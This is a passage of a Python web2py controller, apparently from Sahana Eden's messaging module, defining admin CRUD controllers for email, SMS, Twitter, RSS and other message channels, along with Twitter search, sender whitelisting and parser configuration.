label_list_button = T("List SMS Outbound Gateways"),
label_delete_button = T("Delete SMS Outbound Gateway"),
msg_record_created = T("SMS Outbound Gateway added"),
msg_record_modified = T("SMS Outbound Gateway updated"),
msg_record_deleted = T("SMS Outbound Gateway deleted"),
msg_list_empty = T("No SMS Outbound Gateways currently registered"),
)
return s3_rest_controller()
# -----------------------------------------------------------------------------
def channel():
"""
RESTful CRUD controller for Channels
- unused
"""
return s3_rest_controller()
# -----------------------------------------------------------------------------
def email_channel():
"""
RESTful CRUD controller for Inbound Email channels
- appears in the administration menu
"""
if not auth.s3_has_role("ADMIN"):
auth.permission.fail()
tablename = "msg_email_channel"
table = s3db[tablename]
table.server.label = T("Server")
table.protocol.label = T("Protocol")
table.use_ssl.label = "SSL"
table.port.label = T("Port")
table.username.label = T("Username")
table.password.label = T("Password")
table.delete_from_server.label = T("Delete from Server?")
table.port.comment = DIV(_class = "tooltip",
_title = "%s|%s" % (T("Port"),
T("For POP-3 this is usually 110 (995 for SSL), for IMAP this is usually 143 (993 for IMAP)."),
),
)
table.delete_from_server.comment = DIV(_class = "tooltip",
_title = "%s|%s" % (T("Delete"),
T("If this is set to True then mails will be deleted from the server after downloading."),
),
)
# CRUD Strings
s3.crud_strings[tablename] = Storage(
title_display = T("Email Settings"),
title_list = T("Email Accounts"),
label_create = T("Create Email Account"),
title_update = T("Edit Email Settings"),
label_list_button = T("View Email Accounts"),
msg_record_created = T("Account added"),
msg_record_deleted = T("Email Account deleted"),
msg_list_empty = T("No Accounts currently defined"),
msg_record_modified = T("Email Settings updated"),
)
def postp(r, output):
if r.interactive:
# Normal Action Buttons
s3_action_buttons(r)
# Custom Action Buttons for Enable/Disable
table = r.table
query = (table.deleted == False)
rows = db(query).select(table.id,
table.enabled,
)
restrict_e = [str(row.id) for row in rows if not row.enabled]
restrict_d = [str(row.id) for row in rows if row.enabled]
s3.actions += [{"label": s3_str(T("Enable")),
"restrict": restrict_e,
"url": URL(args = ["[id]", "enable"]),
"_class": "action-btn",
},
{"label": s3_str(T("Disable")),
"restrict": restrict_d,
"url": URL(args = ["[id]", "disable"]),
"_class": "action-btn",
},
]
if not s3task._is_alive():
# No Scheduler Running
s3.actions += [{"label": s3_str(T("Poll")),
"restrict": restrict_d,
"url": URL(args = ["[id]", "poll"]),
"_class": "action-btn",
},
]
return output
s3.postp = postp
return s3_rest_controller()
# -----------------------------------------------------------------------------
def facebook_channel():
"""
RESTful CRUD controller for Facebook channels
- appears in the administration menu
"""
if not auth.s3_has_role("ADMIN"):
auth.permission.fail()
tablename = "msg_facebook_channel"
table = s3db[tablename]
# CRUD Strings
s3.crud_strings[tablename] = Storage(
title_display = T("Facebook Settings"),
title_list = T("Facebook Accounts"),
label_create = T("Add Facebook Account"),
title_update = T("Edit Facebook Settings"),
label_list_button = T("View Facebook Accounts"),
msg_record_created = T("Account added"),
msg_record_deleted = T("Facebook Account deleted"),
msg_list_empty = T("No Accounts currently defined"),
msg_record_modified = T("Facebook Settings updated"),
)
def postp(r, output):
if r.interactive:
# Normal Action Buttons
s3_action_buttons(r)
# Custom Action Buttons for Enable/Disable
table = r.table
query = (table.deleted == False)
rows = db(query).select(table.id,
table.enabled,
)
restrict_e = [str(row.id) for row in rows if not row.enabled]
restrict_d = [str(row.id) for row in rows if row.enabled]
s3.actions += [{"label": s3_str(T("Enable")),
"restrict": restrict_e,
"url": URL(args=["[id]", "enable"]),
"_class": "action-btn",
},
{"label": s3_str(T("Disable")),
"restrict": restrict_d,
"url": URL(args = ["[id]", "disable"]),
"_class": "action-btn",
},
]
#if not s3task._is_alive():
# # No Scheduler Running
# s3.actions += [{"label": s3_str(T("Poll")),
# "restrict": restrict_d),
# "url": URL(args = ["[id]", "poll"]),
# "_class": "action-btn",
# }
# ]
return output
s3.postp = postp
return s3_rest_controller()
# -----------------------------------------------------------------------------
def mcommons_channel():
"""
RESTful CRUD controller for Mobile Commons SMS Channels
- appears in the administration menu
"""
if not auth.s3_has_role("ADMIN"):
auth.permission.fail()
tablename = "msg_mcommons_channel"
table = s3db[tablename]
table.name.label = T("Account Name")
table.name.comment = DIV(_class = "tooltip",
_title = "%s|%s" % (T("Account Name"),
T("Name for your Mobile Commons Account"),
),
)
table.campaign_id.label = T("Campaign ID")
table.url.label = T("URL")
table.url.comment = DIV(_class = "tooltip",
_title = "%s|%s" % (T("URL"),
T("URL for the Mobile Commons API"),
),
)
table.username.label = T("Username")
table.password.label = T("Password")
table.timestmp.label = T("Last Downloaded")
table.timestmp.writable = False
# CRUD Strings
s3.crud_strings[tablename] = Storage(
title_display = T("Mobile Commons Setting Details"),
title_list = T("Mobile Commons Settings"),
label_create = T("Add Mobile Commons Settings"),
title_update = T("Edit Mobile Commons Settings"),
label_list_button = T("View Mobile Commons Settings"),
msg_record_created = T("Mobile Commons Setting added"),
msg_record_deleted = T("Mobile Commons Setting deleted"),
msg_list_empty = T("No Mobile Commons Settings currently defined"),
msg_record_modified = T("Mobile Commons settings updated"),
)
def postp(r, output):
if r.interactive:
# Normal Action Buttons
s3_action_buttons(r)
# Custom Action Buttons for Enable/Disable
table = r.table
query = (table.deleted == False)
rows = db(query).select(table.id,
table.enabled,
)
restrict_e = [str(row.id) for row in rows if not row.enabled]
restrict_d = [str(row.id) for row in rows if row.enabled]
s3.actions += [{"label": s3_str(T("Enable")),
"restrict": restrict_e,
"url": URL(args=["[id]", "enable"]),
"_class": "action-btn",
},
{"label": s3_str(T("Disable")),
"restrict": restrict_d,
"url": URL(args = ["[id]", "disable"]),
"_class": "action-btn",
},
]
if not s3task._is_alive():
# No Scheduler Running
s3.actions += [{"label": s3_str(T("Poll")),
"restrict": restrict_d,
"url": URL(args = ["[id]", "poll"]),
"_class": "action-btn",
},
]
return output
s3.postp = postp
return s3_rest_controller()
# -----------------------------------------------------------------------------
def gcm_channel():
"""
RESTful CRUD controller for Google Cloud Messaging Channels
- appears in the administration menu
"""
if not auth.s3_has_role("ADMIN"):
auth.permission.fail()
tablename = "msg_gcm_channel"
table = s3db[tablename]
table.name.label = T("Account Name")
table.name.comment = DIV(_class = "tooltip",
_title = "%s|%s" % (T("Account Label"),
T("Label for GCM Account"),
),
)
table.api_key.label = T("API KEY")
# CRUD Strings
s3.crud_strings[tablename] = Storage(
title_display = T("Google Cloud Messaging Setting Details"),
title_list = T("Google Cloud Messaging Settings"),
label_create = T("Add Google Cloud Messaging Settings"),
title_update = T("Edit Google Cloud Messaging Settings"),
label_list_button = T("View Google Cloud Messaging Settings"),
msg_record_created = T("Google Cloud Messaging Setting added"),
msg_record_deleted = T("Google Cloud Messaging Setting deleted"),
msg_list_empty = T("No Google Cloud Messaging Settings currently defined"),
msg_record_modified = T("Google Cloud Messaging settings updated"),
)
def postp(r, output):
if r.interactive:
# Normal Action Buttons
s3_action_buttons(r)
# Custom Action Buttons for Enable/Disable
table = r.table
query = (table.deleted != True)
rows = db(query).select(table.id,
table.enabled,
)
restrict_e = [str(row.id) for row in rows if not row.enabled]
restrict_d = [str(row.id) for row in rows if row.enabled]
s3.actions += [{"label": s3_str(T("Enable")),
"restrict": restrict_e,
"url": URL(args=["[id]", "enable"]),
"_class": "action-btn",
},
{"label": s3_str(T("Disable")),
"restrict": restrict_d,
"url": URL(args = ["[id]", "disable"]),
"_class": "action-btn",
},
]
#if not s3task._is_alive():
# No Scheduler Running
# s3.actions += [{"label": s3_str(T("Poll")),
# "restrict": restrict_d,
# "url": URL(args = ["[id]", "poll"]),
# "_class": "action-btn",
# },
# ]
return output
s3.postp = postp
return s3_rest_controller()
# -----------------------------------------------------------------------------
def rss_channel():
"""
RESTful CRUD controller for RSS channels
- appears in the administration menu
"""
if not auth.s3_has_role("ADMIN"):
auth.permission.fail()
tablename = "msg_rss_channel"
table = s3db[tablename]
table.name.label = T("Name")
table.description.label = T("Description")
table.url.label = T("URL/Link")
table.url.comment = DIV(_class = "tooltip",
_title = "%s|%s" % (T("URL"),
T("Link for the RSS Feed."),
),
)
table.enabled.comment = DIV(_class = "tooltip",
_title = "%s|%s" % (T("Subscriptions Status"),
T("Are you susbscribed?"),
),
)
# CRUD Strings
s3.crud_strings[tablename] = Storage(
title_display = T("RSS Channel Details"),
title_list = T("RSS Channels"),
label_create = T("Add RSS Channel"),
title_update = T("Edit RSS Channel"),
label_list_button = T("View RSS Channels"),
msg_record_created = T("Channel added"),
msg_record_deleted = T("RSS Channel deleted"),
msg_list_empty = T("No RSS Channels currently defined"),
msg_record_modified = T("RSS Channel updated"),
)
def status_represent(v):
try:
v = int(v)
except:
# Text
return v
return "There have been no new entries for %s requests" % v
s3db.msg_channel_status.status.represent = status_represent
def postp(r, output):
if r.interactive:
# Normal Action Buttons
s3_action_buttons(r)
# Custom Action Buttons for Enable/Disable
table = r.table
query = (table.deleted == False)
rows = db(query).select(table.id,
table.enabled,
)
restrict_e = [str(row.id) for row in rows if not row.enabled]
restrict_d = [str(row.id) for row in rows if row.enabled]
s3.actions += [{"label": s3_str(T("Subscribe")),
"restrict": restrict_e,
"url": URL(args=["[id]", "enable"]),
"_class": "action-btn",
},
{"label": s3_str(T("Unsubscribe")),
"restrict": restrict_d,
"url": URL(args = ["[id]", "disable"]),
"_class": "action-btn",
},
]
if not s3task._is_alive():
# No Scheduler Running
s3.actions += [{"label": s3_str(T("Poll")),
"restrict": restrict_d,
"url": URL(args = ["[id]", "poll"]),
"_class": "action-btn",
},
]
return output
s3.postp = postp
return s3_rest_controller()
# -----------------------------------------------------------------------------
def twilio_channel():
"""
RESTful CRUD controller for Twilio SMS channels
- appears in the administration menu
"""
if not auth.s3_has_role("ADMIN"):
auth.permission.fail()
tablename = "msg_twilio_channel"
table = s3db[tablename]
table.account_name.label = T("Account Name")
table.account_name.comment = DIV(_class = "tooltip",
_title = "%s|%s" % (T("Account Name"),
T("Identifier Name for your Twilio Account."),
),
)
table.url.label = T("URL")
table.url.comment = DIV(_class = "tooltip",
_title = "%s|%s" % (T("URL"),
T("URL for the twilio API."),
),
)
table.account_sid.label = "Account SID"
table.auth_token.label = T("AUTH TOKEN")
# CRUD Strings
s3.crud_strings[tablename] = Storage(
title_display = T("Twilio Channel Details"),
title_list = T("Twilio Channels"),
label_create = T("Add Twilio Channel"),
title_update = T("Edit Twilio Channel"),
label_list_button = T("View Twilio Channels"),
msg_record_created = T("Twilio Channel added"),
msg_record_deleted = T("Twilio Channel deleted"),
msg_record_modified = T("Twilio Channel updated"),
msg_list_empty = T("No Twilio Channels currently defined"),
)
def postp(r, output):
if r.interactive:
# Normal Action Buttons
s3_action_buttons(r)
# Custom Action Buttons for Enable/Disable
table = r.table
query = (table.deleted == False)
rows = db(query).select(table.id,
table.enabled,
)
restrict_e = [str(row.id) for row in rows if not row.enabled]
restrict_d = [str(row.id) for row in rows if row.enabled]
s3.actions += [{"label": s3_str(T("Enable")),
"restrict": restrict_e,
"url": URL(args=["[id]", "enable"]),
"_class": "action-btn",
},
{"label": s3_str(T("Disable")),
"restrict": restrict_d,
"url": URL(args = ["[id]", "disable"]),
"_class": "action-btn",
},
]
if not s3task._is_alive():
# No Scheduler Running
s3.actions += [{"label": s3_str(T("Poll")),
"restrict": restrict_d,
"url": URL(args = ["[id]", "poll"]),
"_class": "action-btn",
},
]
return output
s3.postp = postp
return s3_rest_controller()
# -----------------------------------------------------------------------------
@auth.s3_requires_membership(1)
def sms_modem_channel():
"""
RESTful CRUD controller for modem channels
- appears in the administration menu
Multiple Modems can be configured to receive Inbound Messages
"""
try:
import serial
except ImportError:
session.error = T("Python Serial module not available within the running Python - this needs installing to activate the Modem")
redirect(URL(c="admin", f="index"))
tablename = "%s_%s" % (c, f)
table = s3db[tablename]
table.modem_port.label = T("Port")
table.modem_baud.label = T("Baud")
table.enabled.label = T("Enabled")
table.modem_port.comment = DIV(_class = "tooltip",
_title = "%s|%s" % (T("Port"),
T("The serial port at which the modem is connected - /dev/ttyUSB0, etc on linux and com1, com2, etc on Windows"),
),
)
table.modem_baud.comment = DIV(_class = "tooltip",
_title = "%s|%s" % (T("Baud"),
T("Baud rate to use for your modem - The default is safe for most cases"),
),
)
table.enabled.comment = DIV(_class = "tooltip",
_title = "%s|%s" % (T("Enabled"),
T("Unselect to disable the modem"),
),
)
# CRUD Strings
s3.crud_strings[tablename] = Storage(
label_create = T("Add Modem Channel"),
title_display = T("Modem Channel Details"),
title_list = T("Modem Channels"),
title_update = T("Edit Modem Channel"),
label_list_button = T("View Modem Channels"),
msg_record_created = T("Modem Channel added"),
msg_record_modified = T("Modem Channel updated"),
msg_record_deleted = T("Modem Channel deleted"),
msg_list_empty = T("No Modem Channels currently defined"),
)
return s3_rest_controller()
#------------------------------------------------------------------------------
@auth.s3_requires_membership(1)
def sms_smtp_channel():
"""
RESTful CRUD controller for SMTP to SMS Outbound channels
- appears in the administration menu
"""
tablename = "%s_%s" % (c, f)
table = s3db[tablename]
table.address.label = T("Address")
table.subject.label = T("Subject")
table.enabled.label = T("Enabled")
table.address.comment = DIV(_class = "tooltip",
_title = "%s|%s" % (T("Address"),
T("Email Address to which to send SMS messages. Assumes sending to phonenumber@address"),
),
)
table.subject.comment = DIV(_class = "tooltip",
_title = "%s|%s" % (T("Subject"),
T("Optional Subject to put into Email - can be used as a Security Password by the service provider"),
),
)
table.enabled.comment = DIV(_class = "tooltip",
_title = "%s|%s" % (T("Enabled"),
T("Unselect to disable this SMTP service"),
),
)
# CRUD Strings
s3.crud_strings["msg_sms_outbound_gateway"] = Storage(
label_create=T("Create SMTP to SMS Channel"),
title_display=T("SMTP to SMS Channel Details"),
title_list=T("SMTP to SMS Channels"),
title_update=T("Edit SMTP to SMS Channel"),
label_list_button=T("List SMTP to SMS Channels"),
label_delete_button=T("Delete SMTP to SMS Channel"),
msg_record_created=T("SMTP to SMS Channel added"),
msg_record_modified=T("SMTP to SMS Channel updated"),
msg_record_deleted=T("SMTP to SMS Channel deleted"),
msg_list_empty=T("No SMTP to SMS Channels currently registered"),
)
s3db.configure(tablename,
update_next = URL(args = [1, "update"]),
)
return s3_rest_controller()
#------------------------------------------------------------------------------
@auth.s3_requires_membership(1)
def sms_webapi_channel():
"""
RESTful CRUD controller for Web API channels
- appears in the administration menu
"""
tablename = "%s_%s" % (c, f)
table = s3db[tablename]
table.url.label = T("URL")
table.message_variable.label = T("Message variable")
table.to_variable.label = T("To variable")
table.username.label = T("Username")
table.password.label = T("Password")
table.enabled.label = T("Enabled")
table.url.comment = DIV(_class = "tooltip",
_title = "%s|%s" % (T("URL"),
T("The URL of your web gateway without the POST parameters"),
),
)
table.parameters.comment = DIV(_class = "tooltip",
_title = "%s|%s" % (T("Parameters"),
T("The POST variables other than the ones containing the message and the phone number"),
),
)
table.message_variable.comment = DIV(_class = "tooltip",
_title="%s|%s" % (T("Message Variable"),
T("The POST variable on the URL used for sending messages"),
),
)
table.to_variable.comment = DIV(_class = "tooltip",
_title = "%s|%s" % (T("To variable"),
T("The POST variable containing the phone number"),
),
)
table.username.comment = DIV(_class = "tooltip",
_title = "%s|%s" % (T("Username"),
T("If the service requries HTTP BASIC Auth (e.g. Mobile Commons)"),
),
)
table.password.comment = DIV(_class = "tooltip",
_title="%s|%s" % (T("Password"),
T("If the service requries HTTP BASIC Auth (e.g. Mobile Commons)"),
),
)
table.enabled.comment = DIV(_class = "tooltip",
_title="%s|%s" % (T("Enabled"),
T("Unselect to disable this API service"),
),
)
# CRUD Strings
s3.crud_strings[tablename] = Storage(
label_create = T("Create Web API Channel"),
title_display = T("Web API Channel Details"),
title_list = T("Web API Channels"),
title_update = T("Edit Web API Channel"),
label_list_button = T("List Web API Channels"),
label_delete_button = T("Delete Web API Channel"),
msg_record_created = T("Web API Channel added"),
msg_record_modified = T("Web API Channel updated"),
msg_record_deleted = T("Web API Channel deleted"),
msg_list_empty = T("No Web API Channels currently registered"),
)
return s3_rest_controller()
# -----------------------------------------------------------------------------
@auth.s3_requires_membership(1)
def tropo_channel():
"""
RESTful CRUD controller for Tropo channels
- appears in the administration menu
"""
tablename = "msg_tropo_channel"
table = s3db[tablename]
table.token_messaging.label = T("Tropo Messaging Token")
table.token_messaging.comment = DIV(DIV(_class = "stickytip",
_title = "%s|%s" % (T("Tropo Messaging Token"),
T("The token associated with this application on") + " <a href='https://www.tropo.com/docs/scripting/troposessionapi.htm' target=_blank>Tropo.com</a>"),
),
)
#table.token_voice.label = T("Tropo Voice Token")
#table.token_voice.comment = DIV(DIV(_class="stickytip",_title=T("Tropo Voice Token") + "|" + T("The token associated with this application on") + " <a href='https://www.tropo.com/docs/scripting/troposessionapi.htm' target=_blank>Tropo.com</a>"))
# CRUD Strings
s3.crud_strings[tablename] = Storage(
label_create = T("Create Tropo Channel"),
title_display = T("Tropo Channel Details"),
title_list = T("Tropo Channels"),
title_update = T("Edit Tropo Channel"),
label_list_button = T("List Tropo Channels"),
label_delete_button = T("Delete Tropo Channel"),
msg_record_created = T("Tropo Channel added"),
msg_record_modified = T("Tropo Channel updated"),
msg_record_deleted = T("Tropo Channel deleted"),
msg_list_empty = T("No Tropo Channels currently registered"),
)
return s3_rest_controller()
# -----------------------------------------------------------------------------
@auth.s3_requires_membership(1)
def twitter_channel():
"""
RESTful CRUD controller for Twitter channels
- appears in the administration menu
Only 1 of these normally in existence
@ToDo: Don't enforce
"""
#try:
# import tweepy
#except:
# session.error = T("tweepy module not available within the running Python - this needs installing for non-Tropo Twitter support!")
# redirect(URL(c="admin", f="index"))
tablename = "%s_%s" % (c, f)
table = s3db[tablename]
# CRUD Strings
s3.crud_strings[tablename] = Storage(
title_display = T("Twitter account Details"),
title_list = T("Twitter accounts"),
label_create = T("Add Twitter account"),
title_update = T("Edit Twitter account"),
label_list_button = T("View Twitter accounts"),
msg_record_created = T("Twitter account added"),
msg_record_deleted = T("Twitter account deleted"),
msg_record_modified = T("Twitter account updated"),
msg_list_empty = T("No Twitter accounts currently defined"),
)
def prep(r):
oauth_consumer_key = settings.msg.twitter_oauth_consumer_key
oauth_consumer_secret = settings.msg.twitter_oauth_consumer_secret
if not (oauth_consumer_key and oauth_consumer_secret):
session.error = T("You should edit Twitter settings in models/000_config.py")
return True
oauth = tweepy.OAuthHandler(oauth_consumer_key,
oauth_consumer_secret)
if r.http == "GET" and r.method in ("create", "update"):
# We're showing the form
_s3 = session.s3
try:
_s3.twitter_oauth_url = oauth.get_authorization_url()
_s3.twitter_request_key = oauth.request_token.key
_s3.twitter_request_secret = oauth.request_token.secret
except tweepy.TweepError:
session.error = T("Problem connecting to twitter.com - please refresh")
return True
#table.pin.readable = True
#table.pin.label = T("PIN number from Twitter (leave empty to detach account)")
#table.pin.value = ""
table.twitter_account.label = T("Current Twitter account")
return True
else:
# Not showing form, no need for pin
#table.pin.readable = False
#table.pin.label = T("PIN") # won't be seen
#table.pin.value = "" # but let's be on the safe side
pass
return True
#s3.prep = prep
# Post-process
def postp(r, output):
if r.interactive:
# Normal Action Buttons
s3_action_buttons(r)
# Custom Action Buttons for Enable/Disable
table = r.table
query = (table.deleted == False)
rows = db(query).select(table.id,
table.enabled,
)
restrict_e = [str(row.id) for row in rows if not row.enabled]
restrict_d = [str(row.id) for row in rows if row.enabled]
s3.actions += [{"label": s3_str(T("Enable")),
"restrict": restrict_e,
"url": URL(args=["[id]", "enable"]),
"_class": "action-btn",
},
{"label": s3_str(T("Disable")),
"restrict": restrict_d,
"url": URL(args = ["[id]", "disable"]),
"_class": "action-btn",
},
]
if not s3task._is_alive():
# No Scheduler Running
s3.actions += [{"label": s3_str(T("Poll")),
"restrict": restrict_d,
"url": URL(args = ["[id]", "poll"]),
"_class": "action-btn",
},
]
#if isinstance(output, dict):
# if r.http == "GET" and r.method in ("create", "update"):
# rheader = A(T("Collect PIN from Twitter"),
# _href = session.s3.twitter_oauth_url,
# _target = "_blank")
# output["rheader"] = rheader
return output
s3.postp = postp
return s3_rest_controller()
# -----------------------------------------------------------------------------
def inject_search_after_save(output):
"""
Inject a Search After Save checkbox
in the Twitter Search Query Form
"""
if "form" in output:
id = "search_after_save"
label = LABEL("%s:" % T("Search After Save?"),
_for = "msg_twitter_search",
)
widget = INPUT(_name = "search_after_save",
_type = "checkbox",
value = "on",
_id = id,
_class = "boolean",
)
comment = ""
if s3_formstyle == "bootstrap":
_controls = DIV(widget,
comment,
_class = "controls",
)
row = DIV(label,
_controls,
_class = "control-group",
_id = "%s__row" % id,
)
elif callable(s3_formstyle):
row = s3_formstyle(id, label, widget, comment)
else:
# Unsupported
raise
output["form"][0][-2].append(row)
# -----------------------------------------------------------------------------
def action_after_save(form):
"""
Schedules Twitter query search immediately after save
depending on flag
"""
if request.post_vars.get("search_after_save"):
s3task.run_async("msg_twitter_search", args = [form.vars.id])
session.information = T("The search results should appear shortly - refresh to see them")
# -----------------------------------------------------------------------------
def twitter_search():
"""
RESTful CRUD controller to add keywords
for Twitter Search
"""
tablename = "msg_twitter_search"
table = s3db[tablename]
table.is_processed.writable = False
table.is_searched.writable = False
table.is_processed.readable = False
table.is_searched.readable = False
# Tweak languages to those supported by Twitter
S3Msg = s3base.S3Msg()
try:
import tweepy
except:
session.error = T("tweepy module not available within the running Python - this needs installing for non-Tropo Twitter support!")
redirect(URL(c="msg", f="index"))
twitter_settings = S3Msg.get_twitter_api()
supported_languages = ['fr', 'en', 'ar', 'ja', 'es', 'de', 'it', 'id', 'pt', 'ko', 'tr', 'ru', 'nl', 'fil',
'msa', 'zh-tw', 'zh-cn', 'hi', 'no', 'sv', 'fi', 'da', 'pl', 'hu', 'fa', 'he', 'ur', 'th']
if twitter_settings:
twitter_api = twitter_settings[0]
try:
supported_languages = [str(x["code"]) for x in twitter_api.supported_languages()]
except (tweepy.TweepError, AttributeError):
# List according to Twitter 1.1 API https://dev.twitter.com/docs/api/1.1/get/help/languages
pass
substitute_list = {"en-gb": "en",
"pt-br": "pt"}
new_langs = []
lang_default = current.response.s3.language
langs = set(settings.get_L10n_languages().keys())
for l in langs:
if l in supported_languages:
new_langs.append(l)
else:
supported_substitute = substitute_list.get(l)
if supported_substitute:
if lang_default == l:
lang_default = supported_substitute
if supported_substitute not in langs:
new_langs.append(supported_substitute)
else:
if lang_default == l:
lang_default = 'en'
langs = new_langs
table.lang.requires = IS_IN_SET(langs)
table.lang.default = lang_default
comment = "Add the keywords separated by single spaces."
table.keywords.comment = DIV(_class = "tooltip",
_title = "%s|%s" % (T("Keywords"),
T(comment),
),
)
# CRUD Strings
s3.crud_strings[tablename] = Storage(
title_display = T("Twitter Search Queries"),
title_list = T("Twitter Search Queries"),
label_create = T("Add Twitter Search Query"),
title_update = T("Edit Twitter Search Query"),
label_list_button = T("View Queries"),
msg_record_created = T("Query added"),
msg_record_deleted = T("Query deleted"),
msg_list_empty = T("No Query currently defined"),
msg_record_modified = T("Query updated"),
)
if request.post_vars.get("search_after_save"):
url_after_save = URL(f="twitter_result")
else:
url_after_save = None
s3db.configure(tablename,
create_next = url_after_save,
create_onaccept = action_after_save,
deletable = True,
listadd = True,
)
def prep(r):
if r.interactive:
table = s3db.msg_twitter_channel
if not db(table.id > 0).select(table.id,
limitby = (0, 1),
).first():
session.error = T("Need to configure Twitter Authentication")
redirect(URL(f = "twitter_channel"))
return True
s3.prep = prep
def postp(r, output):
if r.interactive:
# Normal Action Buttons
s3_action_buttons(r)
# Custom Action Buttons
rtable = r.table
query = (rtable.deleted == False) & \
(rtable.is_searched == False)
records = db(query).select(rtable.id)
restrict_s = [str(record.id) for record in records]
query = (rtable.deleted == False) & \
(rtable.is_processed == False)
records = db(query).select(rtable.id)
restrict_k = [str(record.id) for record in records]
# @ToDo: Make these S3Methods rather than additional controllers
s3.actions += [{"label": s3_str(T("Search")),
"restrict": restrict_s,
"url": URL(args = ["[id]", "poll"]),
"_class": "action-btn",
},
{"label": s3_str(T("Analyze with KeyGraph")),
"restrict": restrict_k,
"url": URL(args = ["[id]", "keygraph"]),
"_class": "action-btn",
},
]
inject_search_after_save(output)
return output
s3.postp = postp
return s3_rest_controller()
# -----------------------------------------------------------------------------
def twitter_result():
"""
RESTful CRUD controller for Twitter Search Results.
"""
tablename = "msg_twitter_result"
# CRUD Strings
s3.crud_strings[tablename] = Storage(
title_display = T("Twitter Search Results"),
title_list = T("Twitter Search Results"),
label_list_button = T("View Tweets"),
msg_record_deleted = T("Tweet deleted"),
msg_list_empty = T("No Tweets Available."),
)
from s3.s3filter import S3DateFilter, S3TextFilter
filter_widgets = [
S3DateFilter("date",
label = T("Tweeted on"),
hide_time = True,
_class = "date-filter-class",
comment = T("Filter Tweets by the date they were tweeted on"),
),
S3TextFilter("from_address",
label = T("Tweeted by"),
_class = "tweeter-filter-class",
comment = T("Filter Tweets by who tweeted them"),
)
]
report_fields = ["search_id",
"date",
"lang",
]
report_options = Storage(
rows=report_fields,
cols=report_fields,
fact=report_fields,
defaults=Storage(
rows="search_id",
cols="lang",
totals=True,
)
)
s3db.configure(tablename,
deletable = False,
editable = False,
insertable = False,
filter_widgets = filter_widgets,
report_options = report_options,
)
def postp(r, output):
if r.id or r.method in ("read", "display"):
# Display the Tweet as an Embedded tweet
record = output["item"].record
# Tweet link
twitter_url = "https://twitter.com/%s/statuses/%s" % (record.from_address,
record.tweet_id)
script_url = "https://platform.twitter.com/widgets.js"
# Themeable Throbber
throbber = DIV(_class = "s3-twitter-throbber",
)
# Display throbber while Tweet loads
tweet_container = DIV(throbber,
_class = "s3-twitter-container",
)
tweet_user = TAG[""](A(_href = twitter_url,
_style = "display: none"),
)
# Configure Tweet display
attributes = {"_width": "350px",
"_data-conversation": "none",
"_class": "twitter-tweet",
"lang": record.lang,
}
tweet = TAG["blockquote"](tweet_container,
tweet_user,
SCRIPT(_src = script_url,
_charset = "utf-8"),
**attributes
)
# Insert tweet
output["item"] = tweet
return output
s3.postp = postp
return s3_rest_controller()
# -----------------------------------------------------------------------------
def sender():
"""
RESTful CRUD controller for whitelisting senders.
User can assign priority to senders.
"""
tablename = "msg_sender"
# CRUD Strings
s3.crud_strings[tablename] = Storage(
title_display = T("Whitelisted Senders"),
title_list = T("Whitelisted Senders"),
label_create = T("Whitelist a Sender"),
title_update = T("Edit Sender Priority"),
label_list_button = T("View Sender Priority"),
msg_record_created = T("Sender Whitelisted"),
msg_record_deleted = T("Sender deleted"),
msg_list_empty = T("No Senders Whitelisted"),
msg_record_modified = T("Sender Priority updated"),
)
s3db.configure(tablename, listadd=True)
def prep(r):
if r.method == "create":
dsender = request.vars['sender']
dpriority = request.vars['priority']
r.table.sender.default = dsender
r.table.priority.default = dpriority
return True
s3.prep = prep
return s3_rest_controller()
# -----------------------------------------------------------------------------
def keyword():
""" REST Controller """
return s3_rest_controller()
# -----------------------------------------------------------------------------
def parser():
"""
RESTful CRUD controller for Parsers
- appears in the administration menu
"""
if not auth.s3_has_role("ADMIN"):
auth.permission.fail()
def prep(r):
if r.interactive:
# CRUD Strings
s3.crud_strings["msg_parser"] = Storage(
title_display = T("Parser Connection Details"),
title_list = T("Parser Connections"),
label_create = T("Connect Parser"),
title_update = T("Edit Parser Connection"),
label_list_button = T("View Parser Connections"),
msg_record_created = T("Parser connected"),
msg_record_deleted = T("Parser connection removed"),
msg_record_modified = T("Parser connection updated"),
msg_list_empty = T("No Parsers currently connected"),
)
import inspect
import sys
from s3 import S3Represent
template = settings.get_msg_parser()
module_name = "applications.%s.modules.templates.%s.parser" % \
(appname, template)
__import__(module_name)
mymodule = sys.modules[module_name]
S3Parser = mymodule.S3Parser()
# Dynamic lookup of the parsing functions in S3Parser class.
parsers = inspect.getmembers(S3Parser, \
predicate=inspect.isfunction)
parse_opts = []
pappend = parse_opts.append
for p in parsers:
p = p[0]
# Filter out helper functions
if not p.startswith("_"):
pappend(p)
table = r.table
table.channel_id.requires = IS_ONE_OF(db, "msg_channel.channel_id",
S3Represent(lookup = "msg_channel"),
sort = True,
)
table.function_name.requires = IS_IN_SET(parse_opts,
zero = None)
return True
s3.prep = prep
def postp(r, output):
if r.interactive:
# Normal Action Buttons
s3_action_buttons(r)
# Custom Action Buttons for Enable/Disable
table = r.table
query = (table.deleted == False)
rows = db(query).select(table.id,
table.enabled,
)
restrict_e = [str(row.id) for row in rows if not row.enabled]
restrict_d = [str(row.id) for row in rows if row.enabled]
s3.actions += [{"label": s3_str(T("Enable")),
"restrict": restrict_e,
"url": URL(args=["[id]", "enable"]),
"_class": "action-btn",
},
{"label": s3_str(T("Disable")),
"restrict": restrict_d,
"url": URL(args = ["[id]", "disable"]),
"_class": "action-btn",
},
]
if not s3task._is_alive():
# No Scheduler Running
s3.actions += [{"label": s3_str(T("Parse")),
"restrict": restrict_d,
"url": URL(args = ["[id]", "parse"]),
"_class": "action-btn",
},
]
return output
s3.postp = postp
return s3_rest_controller()
# =============================================================================
# The following functions hook into the pr functions:
#
def group():
""" RESTful CRUD controller """
if auth.is_logged_in() or auth.basic():
pass
else:
redirect(URL(c="default", f="user",
args = "login",
vars = {"_next":URL(c="msg", f="group")},
))
table = s3db.pr_group
# Hide unnecessary fields
table.description.readable = table.description.writable = False
# Do not show system groups
s3.filter = (table.system == False)
return s3_rest_controller("pr", "group",
rheader = s3db.pr_rheader,
)
# -----------------------------------------------------------------------------
def group_membership():
""" RESTful CRUD controller """
if auth.is_logged_in() or auth.basic():
pass
else:
redirect(URL(c="default", f="user",
args = "login",
vars = {"_next": URL(c="msg", f="group_membership")},
))
table = s3db.pr_group_membership
# Hide unnecessary fields
table.comments.readable = table.comments.writable = False
table.group_head.readable = table.group_head.writable = False
return s3_rest_controller("pr", f)
# -----------------------------------------------------------------------------
def contacts():
"""
Allow the user to add, update and delete their contacts
- seems to be unused (was called 'contact' & was broken)
"""
table = s3db.pr_contact
#ptable = s3db.pr_person
if auth.is_logged_in() or auth.basic():
